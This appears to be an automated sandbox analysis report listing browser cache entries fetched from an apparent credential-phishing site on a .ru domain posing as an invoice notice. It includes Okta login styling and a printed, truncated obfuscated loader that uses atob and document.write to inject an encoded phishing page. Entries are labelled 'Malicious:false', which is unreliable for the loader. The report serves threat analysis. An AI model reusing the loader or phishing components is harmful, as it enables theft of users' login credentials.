                                                                                                                                              Preview:.PNG........IHDR.......^.....l2`...).IDATx..}...U.... w...B..P$.Hv..t......x.EA@.Q`.E......-.".(..X`..D....5]]U}....$3...&...guOw..}>.....~....w.ZZ...z..FZ$I.$I....N.......tt.$e...M....ru$I.$IR.h.AvK0.t..wy.:.1...D.H...LS....iF~.X...smr.$I.$IR.4.....SY..@....h8.....*..dB...1.eG...$I.$.hZ...8.r...[.A.I..XE..hdA{Z..teaF...u:}.1^..-I.$I.FP.A..Nm..........A78...=.%W_.$I..8YQ.H2z#.D_...m..k..u.t..R6#.....N....){...$I..1@...g...@a ..u2..dL...*ai.d.[.$I..D.....OM..a...,h%u.B.....0...57..hrW..$I....Gf.|.=.eg`.........k.J.$IR..<.u....]....@.d...H..$I.$5..MWwu:....H|Y..,.$.I.$I....Qu...s.NzzM..]..;$ I.$IR......+..L9......63.I@.$I..z..#.....:..7...s..<$ I.$I.hP.tu...m"..o1.y.@..W1T<(..... z%."?.4zE..$ ..Y1z`.P..!....`t%t....[..d...N.UKy&.A;..6S...<...........o...]0...r.$I......0..R.....N.....0Wi._.;...M..Lrb{.7w..].jm.r....C...&..gd}..Etm}..~L.l...}n\'...$..Mr.i..{..n..9.....SwMh.}.Q{./wJ.....B]:.....+..\V...A.S.w..6.....,..[.......J@....-.4.....:..Zvt.r.*.

                                                                                                                                              Chrome Cache Entry: 189

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:Web Open Font Format (Version 2), TrueType, length 28000, version 1.66
                                                                                                                                              Category:downloaded
                                                                                                                                              Size (bytes):28000
                                                                                                                                              Entropy (8bit):7.99335735457429
                                                                                                                                              Encrypted:true
                                                                                                                                              SSDEEP:768:NDT1rKvlJOE1AgLlnGj8H58AJUcl5I17ML7FfNHubNIphqb:NDtKvyAhjHeACcl21YL7KNW+
                                                                                                                                              MD5:A4BCA6C95FED0D0C5CC46CF07710DCEC
                                                                                                                                              SHA1:73B56E33B82B42921DB8702A33EFD0F2B2EC9794
                                                                                                                                              SHA-256:5A51D246AF54D903F67F07F2BD820CE77736F8D08C5F1602DB07469D96DBF77F
                                                                                                                                              SHA-512:60A058B20FCB4F63D02E89225A49226CCD7758C21D9162D1B2F4B53BBA951B1C51D3D74C562029F417D97F1FCA93F25FDD2BC0501F215E3C1EF076810B54DD06
                                                                                                                                              Malicious:false
                                                                                                                                              URL:https://2025_notificationx1invoice_review.fmhjhctk.ru/GDSherpa-bold.woff2
                                                                                                                                              Preview:wOF2......m`......$...l....B.......................6....`..<.<..b.....$....6.$..x..>.. .....{...[..q.k.]]O....s...|..n...!..[<;....P&..g....!..I'i..Q.DP....9..J......9G..Q1(..)Jn......8Y......)J.F.c A..7k.v...2=.Z.n.4`...~Nl...4;...S.l{w..:.#..=!. ..X....>[.7........1??.3.?t..qE..f...b...,.Fwcp8...4^.^x..|....Ro<%.."....~0..q..rP..G.......R....-..{O.QeJ.....6.E........{.{.....,h.!.._......$..3..cF@..>........t.o...Fc ...YS.....s.V..j....uk.`n......#....6.....1`kbd..Z..).x...F........T.._..}...p..._F.0.S'.V.g........3.$...Jf.j._,J....v7(...(..bm.....a....Nh.(QS.H...5.w.o.1.[<m.1.cJ......B......R..L..>[|@..]../...6.\..(.j.Bn...Oj.&/j@.'T...w.,...*...e.g.I=.w.x..ap..?.......lI../..uuDH.P.....)._...<..C.x.......Kh.P.|"M..JQ......?`..S@{..o..RjCE.qx.p.!(Wi....dY.%./r.#.p..C ..........r.o4P.}...3X..].....6.'~&...]...*y...YQ..9."v....3...oEMQoWM.W`................Y.V..O2......l....p.1..B..Fn..o.<..,C......^.Y.C...W..tX..|.`...5:.Yd@]..j..$...v.

                                                                                                                                              Chrome Cache Entry: 190

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:ASCII text, with very long lines (10450)
                                                                                                                                              Category:downloaded
                                                                                                                                              Size (bytes):10498
                                                                                                                                              Entropy (8bit):5.327380141461276
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:192:x9iW+rIadfLTcaTO5BrwjnwSrQ1kPmqQmMjmtmumobU8:x9KVLbw6jqON
                                                                                                                                              MD5:E0D37A504604EF874BAD26435D62011F
                                                                                                                                              SHA1:4301F0D2B729AE22ADECE657D79ECCAA25F429B1
                                                                                                                                              SHA-256:C39FF65E2A102E644EB0BF2E31D2BAD3D18F7AFB25B3B9BA7A4D46263A711179
                                                                                                                                              SHA-512:EF838FD58E0D12596726894AB9418C1FBE31833C187C3323EBFD432970EB1593363513F12114E78E008012CDEF15B504D603AFE4BB10AE5C47674045ACC5221E
                                                                                                                                              Malicious:false
                                                                                                                                              URL:https://ok4static.oktacdn.com/assets/loginpage/css/loginpage-theme.e0d37a504604ef874bad26435d62011f.css
                                                                                                                                              Preview:a,abbr,acronym,address,applet,b,big,blockquote,body,caption,center,cite,code,dd,del,dfn,div,dl,dt,em,fieldset,form,h1,h2,h3,h4,h5,h6,html,i,iframe,img,ins,kbd,label,legend,li,object,ol,p,pre,q,s,samp,small,span,strike,strong,sub,sup,table,tbody,td,tfoot,th,thead,tr,tt,u,ul,var{background:transparent;border:0;font-size:100%;font:inherit;margin:0;outline:0;padding:0;vertical-align:baseline}body{line-height:1}ol,ul{list-style:none}blockquote,q{quotes:none}blockquote:after,blockquote:before,q:after,q:before{content:"";content:none}:focus{outline:0}ins{text-decoration:none}del{text-decoration:line-through}table{border-collapse:collapse;border-spacing:0}input[type=hidden]{display:none!important}input[type=checkbox],input[type=radio]{border:0!important;margin:0;padding:0}@font-face{font-family:Proxima Nova;font-style:normal;font-weight:400;src:url(../font/assets/proximanova-reg-webfont.9d5837512674046fa816.eot);src:url(../font/assets/proximanova-reg-webfont.9d5837512674046fa816.eot?#iefix) fo

                                                                                                                                              Chrome Cache Entry: 191

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (65360)
                                                                                                                                              Category:downloaded
                                                                                                                                              Size (bytes):191435
                                                                                                                                              Entropy (8bit):4.668227054674027
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:1536:+IDyiDo+pXXOVgwCA0gQ4b2IDyiDo+pXXOVgwCA0gQ4bRLByvLBy7:7BorTBornk6
                                                                                                                                              MD5:82EAC2196D265783ED682107A09C163E
                                                                                                                                              SHA1:37D02FFE1AA546F1B069E2E4833066F660AB34A9
                                                                                                                                              SHA-256:9ADCF429F16D222E396B53115D4AA80142FF7DC428AA937FE051CF7AEF0E3608
                                                                                                                                              SHA-512:18F5A201EB2820E5216A3040F93BCC98E426F6EFF2A8C7F8C6F464C116940843752C4877C568BB0098BAC4E6C59EEA0BAE5656C8C5961132ABC41CFF7C779569
                                                                                                                                              Malicious:false
                                                                                                                                              URL:https://2025_notificationx1invoice_review.fmhjhctk.ru/aNAtEaDInodo/
                                                                                                                                              Preview:<script>.uDLYbfbOoA = atob("aHR0cHM6Ly8wWC5mbWhqaGN0ay5ydS9hTkF0RWFESW5vZG8v");.ziyPEGdyEf = atob("bm9tYXRjaA==");.JwWppDUbkm = atob("d3JpdGU=");.if(uDLYbfbOoA == ziyPEGdyEf){.document[JwWppDUbkm](decodeURIComponent(escape(atob('PCFET0NUWVBFIGh0bWw+CjxodG1sPgo8aGVhZD4KICAgIDxsaW5rIHJlbD0iaWNvbiIgaHJlZj0iaHR0cHM6Ly9kZXZlbG9wZXJzLmNsb3VkZmxhcmUuY29tL2Zhdmljb24ucG5nIiB0eXBlPSJpbWFnZS94LWljb24iPgogICAgPG1ldGEgaHR0cC1lcXVpdj0iWC1VQS1Db21wYXRpYmxlIiBjb250ZW50PSJJRT1FZGdlLGNocm9tZT0xIj4KICAgIDxtZXRhIG5hbWU9InJvYm90cyIgY29udGVudD0ibm9pbmRleCwgbm9mb2xsb3ciPgogICAgPG1ldGEgbmFtZT0idmlld3BvcnQiIGNvbnRlbnQ9IndpZHRoPWRldmljZS13aWR0aCwgaW5pdGlhbC1zY2FsZT0xLjAiPgogICAgPHRpdGxlPiYjODIwMzs8L3RpdGxlPgogICAgPHNjcmlwdD4KICAgIGNvbnN0IFlFWW1SbmtkeWkgPSB7CiAgZ2V0KEVpZm1Ud1BtdEgsIEdpVG9OUmlFUlUpIHsKICAgIGNvbnN0IHFkSGVEUmhmZW0gPSBbLi4uR2lUb05SaUVSVV0KICAgICAgLm1hcChMVGFWSklpRE5HID0+ICsoJ+++oCcgPiBMVGFWSklpRE5HKSkKICAgICAgLmpvaW4oJycpOwogICAgY29uc3QgeFNiRVprY0trdCA9IHFkSGVEUmhmZW0ucmVwbGFjZSgvLns4fS9nLCBCWWNvWXd

                                                                                                                                              Chrome Cache Entry: 192

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
                                                                                                                                              Category:downloaded
                                                                                                                                              Size (bytes):937
                                                                                                                                              Entropy (8bit):7.737931820487441
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:2PUSIn/IylOgX9qCigRmHQxlCNebarFY9:2PLCHlOgXQ9Oie+rw
                                                                                                                                              MD5:FC3B7BBE7970F47579127561139060E2
                                                                                                                                              SHA1:3F7C5783FE1F4404CB16304A5A274778EA3ABD25
                                                                                                                                              SHA-256:85E6223AFDBD5BADF2C79BCFBAA6FE686ACAA781ECA52C196647FFABB3BE2FFE
                                                                                                                                              SHA-512:49FA22DE92BEBEDE28BB72F7C7902C01D59E56723811629E40C8A887E34FD0B392A9DF169A238BDD8E46D984E76312D75B2644B8611C66A71A559C1B6834DE6C
                                                                                                                                              Malicious:false
                                                                                                                                              URL:https://developers.cloudflare.com/favicon.png
                                                                                                                                              Preview:.PNG........IHDR... ... .....szz.....pHYs...........~....[IDATX..KHTQ..g...&....!pY-.q.-B.H....Q`HY.wL.L....D....M.hS.H.w..wF..y|..s.9..2.6s..w.....}.9........m.{"."q.Q..x.ZO..h.U.y.3.].^.M. .0...D7L...D....w...a$}/u..)n....@......8.V.y6..X..U.QgA.\.Q.F..~.>..'......g.=.2..VW..\....`1d......q..........6...Y...L.g9....l.-...z.t.CE|...d5...b..H?....4...+.J.....9.E..-. ..R$.D.S....7...b..i..\q.?0..9....,d&...mw.L..&N.FpM"...;.......O[db/...-....Q<..WDhN.nu....%...m......A.S.._.>w...0.u..TJ...)......u..(=.!.."zTE0....J....ki#..n0..^.._"..D.....u..p.*=.&d..1....8...f.kR.3G6.t....Vcl.o=~/.$./...I.....$............(]...9.,...i....e... ..........._....@.h./......./U2Nd..........U..|...{.(...y....`.|....z\..z.@.o5...-...O.T.TL).5...y.m.......zZ........:..B..i..w...?!...m-xi.....;...e.0.A...W.}..E...u......h0O./...U..jA..., ..{.(......._=.w#.~..<..g.Vz....o@.e...........2.....T....IEND.B`.

                                                                                                                                              Chrome Cache Entry: 193

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:SVG Scalable Vector Graphics image
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):7390
                                                                                                                                              Entropy (8bit):4.02755241095864
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:192:cdEMK4RwidEMK4Rwbwm6xiD7x9m9t6EQ3FabrItDWOO6DcA:cdEMVwidEMVwbwtxiDHmP6lFeItDWOOc
                                                                                                                                              MD5:B59C16CA9BF156438A8A96D45E33DB64
                                                                                                                                              SHA1:4E51B7D3477414B220F688ADABD76D3AE6472EE3
                                                                                                                                              SHA-256:A7EE799DD5B6F6DBB70B043B766362A6724E71458F9839306C995F06B218C2F8
                                                                                                                                              SHA-512:2C7095E4B819BC5CAA06811A55C0DAE6706970F981806DCF7FD41F744C1DC6A955657A8E57829B39B376B892E8173E8A41F683D329CFBBD0EC4D4019B10E52FF
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:<svg width="48" height="48" viewBox="0 0 48 48" fill="none" xmlns="http://www.w3.org/2000/svg">..<mask id="07b26034-56a3-49d2-8f26-c7b84eb4eed4" fill="#ffffff">..<path fill-rule="evenodd" clip-rule="evenodd" d="M23.9762 0C16.8244 0 10.9707 5.24325 10.335 12.9974C6.89614 14.0647 4.5 17.2233 4.5 20.9412C4.50019 20.968 4.50041 20.9949 4.50066 21.0218C4.50022 21.0574 4.5 21.093 4.5 21.1287C4.55021 28.2609 6.80967 39.1601 18.6091 46.4932C21.8225 48.5023 25.8896 48.5023 29.1532 46.4932C41.053 39.2103 43.3125 28.3111 43.3125 21.1287C43.3125 21.108 43.3124 21.0872 43.3123 21.0665C43.3124 21.0246 43.3125 20.9829 43.3125 20.9412C43.3125 17.3371 41.0055 14.1946 37.6702 13.0618C37.0607 5.27148 31.147 0 23.9762 0ZM12.2354 38.4694C14.3087 33.9987 18.8368 30.8981 24.0891 30.8981C29.2395 30.8981 33.6936 33.8797 35.8194 38.2109C33.9302 40.6119 31.4399 42.8954 28.1744 44.8939L28.1724 44.8952L28.1703 44.8965C25.5047 46.5374 22.2037 46.5293 19.6031 44.9034L19.6009 44.902L19.5988 44.9007C16.4876 42.9672 14

                                                                                                                                              Chrome Cache Entry: 194

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:Web Open Font Format, TrueType, length 36696, version 1.0
                                                                                                                                              Category:downloaded
                                                                                                                                              Size (bytes):36696
                                                                                                                                              Entropy (8bit):7.988666025644622
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:768:lvJo4KciQZYjebVq19lKPtHAQ/l4rj2bqkiHShpeSUOR4OqWOgaU:lhH3rVq1PKP432tSSh4SUORHqWcU
                                                                                                                                              MD5:A69E9AB8AFDD7486EC0749C551051FF2
                                                                                                                                              SHA1:C34E6AA327B536FB48D1FE03577A47C7EE2231B8
                                                                                                                                              SHA-256:FD78A1913DB912221B8EAD1E62FAD47D1FF0A9FA6CD88D3B128A721AD91D2FAF
                                                                                                                                              SHA-512:9A0E4297282542B8813F9CC85B2CCB09663CE281F64503F9A5284631881DA9AACF7649553BF1423D941F01B97E6BC3BA50AB13E55E4B7B61C5AA0A4ADF4D390F
                                                                                                                                              Malicious:false
                                                                                                                                              URL:https://2025_notificationx1invoice_review.fmhjhctk.ru/GDSherpa-regular.woff
                                                                                                                                              Preview:wOFF.......X......6........0...(............DSIG...(............GPOS..........^>....GSUB.............3y.OS/2.......F...`h`{Zcmap...........<.?+.cvt .......0...<(...fpgm............?...gasp................glyf.."0..Tl...h...+head..v....4...6..}.hhea..v....!...$...Zhmtx..v........x;...loca..z|...........tmaxp..~$... ... .-..name..~D.......'....post............1+.,prep.............P..x..\.|U..Nr.^.......DD.T....V...C....U._.N..k.8.m...h.Q.6q....#....Y4l.}3.@ .............Z_....s.....>RD.....J....wR./...#.,<'f....4b..}(....P..\.s.9'.....-.Q..d..H.@%..K+....4U.4...yx.3..DkfJ..3S.H......|..........%.B...........W.~..nN<x.?....}jn...W..M.7...?...:-uAjQ.4J.].vm....H{&...y..@....G...~.......x=.V..g.;..@..J.l...G..L... g*M..h.....Q!}B...Q.m.M...R.5*.JUi*..U_5@]..PW...*5H.VW.k..:5D].nP#..5V=....x.....W/...E5I...NVS.T.u...^U3._...m5G-P...U...Gj.*V..j.Z...j..BJ.._Pw..0..f*...q...q5...'.F=MIj.7..^.f."..K\..pHMC.t.W.Z.Bz...l.+.....e|......B>....1.a,.D.Ej..(.

                                                                                                                                              Chrome Cache Entry: 195

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:SVG Scalable Vector Graphics image
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):2905
                                                                                                                                              Entropy (8bit):3.962263100945339
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:48:zcr2Vxfbf9lAi39AkJDTTHBhhqithUg4wnTSKprgAnxptzGe:gajfr9DfdhhbSkPptzv
                                                                                                                                              MD5:FE87496CC7A44412F7893A72099C120A
                                                                                                                                              SHA1:A0C1458C08A815DF63D3CB0406D60BE6607CA699
                                                                                                                                              SHA-256:55CE3B0CE5BC71339308107982CD7671F96014256DED0BE36DC8062E64C847F1
                                                                                                                                              SHA-512:E527C6CD2A3D79CA828A9126E8FF7009A540AA764082750D4FA8207C2B8439CA1FDC4459E935D708DC59DCFFE55FE45188EB5E266D1B745FCA7588501BC0117D
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:<svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" viewBox="0 0 48 48"><title>assets</title><rect width="48" height="48" fill="none"/><path d="M30.422,29.092a3.493,3.493,0,0,1,1.324.261,3.381,3.381,0,0,1,1.132.749q.366.366.827.775t.949.854q.488.444.941.932a9.974,9.974,0,0,1,.819,1A4.951,4.951,0,0,1,37,34.736a3.133,3.133,0,0,1,.218,1.15,3.493,3.493,0,0,1-.261,1.324,3.381,3.381,0,0,1-.749,1.132q-.888.888-1.6,1.568a8.753,8.753,0,0,1-1.489,1.15,6.17,6.17,0,0,1-1.716.705A9.367,9.367,0,0,1,29.151,42a13.73,13.73,0,0,1-3.9-.592A21.891,21.891,0,0,1,21.26,39.77a27.749,27.749,0,0,1-3.885-2.491,34.863,34.863,0,0,1-3.6-3.153,34.6,34.6,0,0,1-3.127-3.606,27.717,27.717,0,0,1-2.456-3.876A22.2,22.2,0,0,1,6.584,22.69,13.485,13.485,0,0,1,6,18.866,9.453,9.453,0,0,1,6.235,16.6a6.2,6.2,0,0,1,.7-1.707,8.848,8.848,0,0,1,1.141-1.489q.679-.723,1.585-1.611a3.381,3.381,0,0,1,1.132-.749,3.493,3.493,0,0,1,1.324-.261,3.3,3.3,0,0,1,1.681.47,8.648,8.648,0,0,1,1.542,1.15,17.725,17.725,0,0,1,1.376,1.428q.645.

                                                                                                                                              Chrome Cache Entry: 196

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:ASCII text, with very long lines (10017)
                                                                                                                                              Category:downloaded
                                                                                                                                              Size (bytes):10245
                                                                                                                                              Entropy (8bit):5.437589264532084
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:192:LRSvXVHfVj+WdqfkkoKhUBhMAcT6iuvBiFj0gba6qiG2pPj:LQvXVHXiNkMAcT6i+4mgPj
                                                                                                                                              MD5:6C20A2BE8BA900BC0A7118893A2B1072
                                                                                                                                              SHA1:FF7766FDE1F33882C6E1C481CEED6F6588EA764C
                                                                                                                                              SHA-256:B1C42ACD0288C435E95E00332476781532ED002CAC6F3DCEE9110CED30B31500
                                                                                                                                              SHA-512:8F80AD8ADC44845D24E13D56738A2CA2A73EE6FCDC187542BA4AAEBBF8817935D053A2ACFB0D425B9CC0C582B5091E1C9FE16B90B3AA682187645067C267FC41
                                                                                                                                              Malicious:false
                                                                                                                                              URL:https://objects.githubusercontent.com/github-production-release-asset-2e65be/2925284/11f3acf8-4ccb-11e6-8ce4-c179c0a212de?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20250317%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20250317T205513Z&X-Amz-Expires=300&X-Amz-Signature=e616e7388ad102e9cb0d3ae02f97cd7c71b53bb553c2889c097375ffd2fede86&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3Drandexp.min.js&response-content-type=application%2Foctet-stream
                                                                                                                                              Preview://.// randexp v0.4.3.// Create random strings that match a given regular expression..//.// Copyright (C) 2016 by Roly Fentanes (https://github.com/fent).// MIT License.// http://github.com/fent/randexp.js/raw/master/LICENSE .//.!function(){var e="RandExp",t=function(){return function e(t,n,r){function o(s,i){if(!n[s]){if(!t[s]){var u="function"==typeof require&&require;if(!i&&u)return u(s,!0);if(a)return a(s,!0);var p=new Error("Cannot find module '"+s+"'");throw p.code="MODULE_NOT_FOUND",p}var h=n[s]={exports:{}};t[s][0].call(h.exports,function(e){var n=t[s][1][e];return o(n?n:e)},h,h.exports,e,t,n,r)}return n[s].exports}for(var a="function"==typeof require&&require,s=0;s<r.length;s++)o(r[s]);return o}({1:[function(e,t,n){function r(e){return e+(e>=97&&122>=e?-32:e>=65&&90>=e?32:0)}function o(){return!this.randInt(0,1)}function a(e){return e instanceof h?e.index(this.randInt(0,e.length-1)):e[this.randInt(0,e.length-1)]}function s(e){if(e.type===p.types.CHAR)return new h(e.value);if(e.

                                                                                                                                              Chrome Cache Entry: 197

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:very short file (no magic)
                                                                                                                                              Category:downloaded
                                                                                                                                              Size (bytes):1
                                                                                                                                              Entropy (8bit):0.0
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:3:V:V
                                                                                                                                              MD5:CFCD208495D565EF66E7DFF9F98764DA
                                                                                                                                              SHA1:B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
                                                                                                                                              SHA-256:5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
                                                                                                                                              SHA-512:31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
                                                                                                                                              Malicious:false
                                                                                                                                              URL:https://zy03ki.qakaco.ru/loray$vfuz4e
                                                                                                                                              Preview:0

                                                                                                                                              Chrome Cache Entry: 198

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):892
                                                                                                                                              Entropy (8bit):5.863167355052868
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:qaPlKKVkz1f+tPUgo/KQGbEZAuYED9qk9neYVxyzyb7PumHe/Q/:qElbQ1f+Bo/LfAuYEJxnHDyzqyQ/
                                                                                                                                              MD5:41D62CA205D54A78E4298367482B4E2B
                                                                                                                                              SHA1:839AAE21ED8ECFC238FDC68B93CCB27431CD5393
                                                                                                                                              SHA-256:20A4A780DB0BCC047015A0D8037EB4EB58B3E5CB338673799C030A3E1B626B40
                                                                                                                                              SHA-512:82B9806490A0DB493DA16466738437B9BB54B979075DB58C89CA0D192D780DDB5ED888E10CE76A53D48D30D5013791CAC7AB468D85B61D32766140DD53DC9044
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:RIFFt...WEBPVP8X....0.../../..ICCP.............0..mntrRGB XYZ ............acsp.......................................-....................................................desc.......$rXYZ........gXYZ...(....bXYZ...<....wtpt...P....rTRC...d...(gTRC...d...(bTRC...d...(cprt.......<mluc............enUS.........s.R.G.BXYZ ......o...8.....XYZ ......b.........XYZ ......$.........XYZ ...............-para..........ff......Y.......[........mluc............enUS... .....G.o.o.g.l.e. .I.n.c... .2.0.1.6ALPH=......m[..H.A.).U....A..C.u@. ....L.......;.....$3{2{....3..V6.i.W.F.h..ee^k.:..cl.Z.eb.....).IZ....!....;X.:&...hF0...kM......!W5.ak8.......#V.s...2...`..v...}.(0 p../s.'VS`SjX.B.,...v.#./I....}.b....^*1..k.:F9hgb.HgW.Q^.r}..Y5....'.JJ....&.."]<.M.Z)o.H..].i.H1..G.P>.b.{.G.\BYx*.[.y...?L....:.%.d......%.q..VP8 @...0....*0.0.>U .E..!.4.8.D...o..z...A....Z........?..z......k...

                                                                                                                                              Chrome Cache Entry: 199

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:SVG Scalable Vector Graphics image
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):270
                                                                                                                                              Entropy (8bit):4.840496990713235
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6:tI9mc4slzIzUQYqRRn3u0xboUSWuUX8+TQMRAvY:t4uzEu3u0xUUluUs+TQMRAQ
                                                                                                                                              MD5:40EB39126300B56BF66C20EE75B54093
                                                                                                                                              SHA1:83678D94097257EB474713DEC49E8094F49D2E2A
                                                                                                                                              SHA-256:765709425A5B9209E875DCCF2217D3161429D2D48159FC1DF7B253B77C1574F4
                                                                                                                                              SHA-512:9C9CD1752A404E71772003469550D3B4EFF8346A4E47BE131BB2B9CB8DD46DBEF4863C52A63A9C63989F9ABEE775CB63C111ADD7AFA9D4DFC7A4D95AE30F9C6E
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" viewBox="0 0 12 12"><title>assets</title><rect width="12" height="12" fill="none"/><path d="M6.7,6,12,11.309,11.309,12,6,6.7.691,12,0,11.309,5.3,6,0,.691.691,0,6,5.3,11.309,0,12,.691Z" fill="#262626"/></svg>

                                                                                                                                              Chrome Cache Entry: 200

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1298
                                                                                                                                              Entropy (8bit):6.665390877423149
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:L+aPlKKVkz1f+tPUgo/KQGbEZAu6hZjJ+uvRGumDyqCuiRFqB6dhQiZmh7:L+ElbQ1f+Bo/LfAuk4uvR5mDymiRFqBN
                                                                                                                                              MD5:32CA2081553E969F9FDD4374134521AD
                                                                                                                                              SHA1:7B09924C4C3D8B6E41FE38363E342DA098BE4173
                                                                                                                                              SHA-256:216FC342A469AA6A005B2EACC24622095E5282D3E9F1AE99CE54C27B92EC3587
                                                                                                                                              SHA-512:F75749C6344FCD7BF06872A3678BB2EB4CAE2DDC31CC5D1EE73EFBA843705577841667733A83163AF4336EC8A32DF93E7A36155BD6282D7BB86159644975948C
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:RIFF....WEBPVP8X....0...k.....ICCP.............0..mntrRGB XYZ ............acsp.......................................-....................................................desc.......$rXYZ........gXYZ...(....bXYZ...<....wtpt...P....rTRC...d...(gTRC...d...(bTRC...d...(cprt.......<mluc............enUS.........s.R.G.BXYZ ......o...8.....XYZ ......b.........XYZ ......$.........XYZ ...............-para..........ff......Y.......[........mluc............enUS... .....G.o.o.g.l.e. .I.n.c... .2.0.1.6ALPHX.....\m{.z..........T ..Q....R..*.X....U`..@......Yyy..<q.."b..a....K._.....jH.*...}q..........^.-.\.4. &.H~.q..H.q.'.t..p....0)...X.....8./.... ..6.#H..Y..../...E>.#.tv....9.\.p5......h......1.{@.k].(1...B.........u.n....=....sX...*..I.c]r....S.....u.a...X.....Pi..q.$73..ga..h%9.S.l.....}....^%.@:Q....we8x..j..3.^.}5.fFtZ...3....<. x.s....d@(./.<].y...m.....T..........T.P`....5..<qYl.g..k..N. `_...f....yN.R.PB..p|..-.%.`y.._.]C.v.<.Y...V..I..(.c....>...........k....nt

                                                                                                                                              Chrome Cache Entry: 201

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):25216
                                                                                                                                              Entropy (8bit):7.947339442168474
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:768:BTwdm3bbEPDrEQT87zOyJ0WsnoU+RBshw:64LQXEN7DJGSRBs
                                                                                                                                              MD5:F9A795E2270664A7A169C73B6D84A575
                                                                                                                                              SHA1:0FBB60AB27AB88C064EB347D0722C8ED4CF5E8B8
                                                                                                                                              SHA-256:D00203B2EEA6E418C31BAAFA949ADA5349A9F9B7E99FA003AEC7406822693740
                                                                                                                                              SHA-512:E17C8D922F52C8AB36D9C0A7DC41D32735CF1680EA653056308C6D23255FDBE40B96C68F0E7F8B3B521B6ACB080CD825F94320364B0A70141606A4449D980517
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:RIFFxb..WEBPVP8X....0...o.....ICCP.............0..mntrRGB XYZ ............acsp.......................................-....................................................desc.......$rXYZ........gXYZ...(....bXYZ...<....wtpt...P....rTRC...d...(gTRC...d...(bTRC...d...(cprt.......<mluc............enUS.........s.R.G.BXYZ ......o...8.....XYZ ......b.........XYZ ......$.........XYZ ...............-para..........ff......Y.......[........mluc............enUS... .....G.o.o.g.l.e. .I.n.c... .2.0.1.6ALPH.Y....'$H..xkD....oUS..[.uM....CwI.H#.H.t(..!J.AJ# .(........0.W.?D...g.6..u......}K5.>|....^..*2.....z..../.1..F..A...Vk..W.Wm?z....H+.;:...s..Z;....V.....Z.gm.......\>.}..-.....w...D.........+,K...#......._[L.[.]w1..[.l..8.....f..E...W....;....o.Q...T`.W.(..........;^........:.T..6......Yo..x.6..n.\A.5X.........J....2.O.)....0..zdL1.x.X..e?.eA.M%f.D..W.].A=6D.....w....>.*3|M.7....aEe&l.or.Tt^.*6li..lYz.HF.....2.\...U.tfQ.<ZlHB.G--....]T..h.L.U]...m....{..T{....~......K#

                                                                                                                                              Chrome Cache Entry: 202

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:SVG Scalable Vector Graphics image
                                                                                                                                              Category:downloaded
                                                                                                                                              Size (bytes):270
                                                                                                                                              Entropy (8bit):4.840496990713235
                                                                                                                                              Encrypted:false
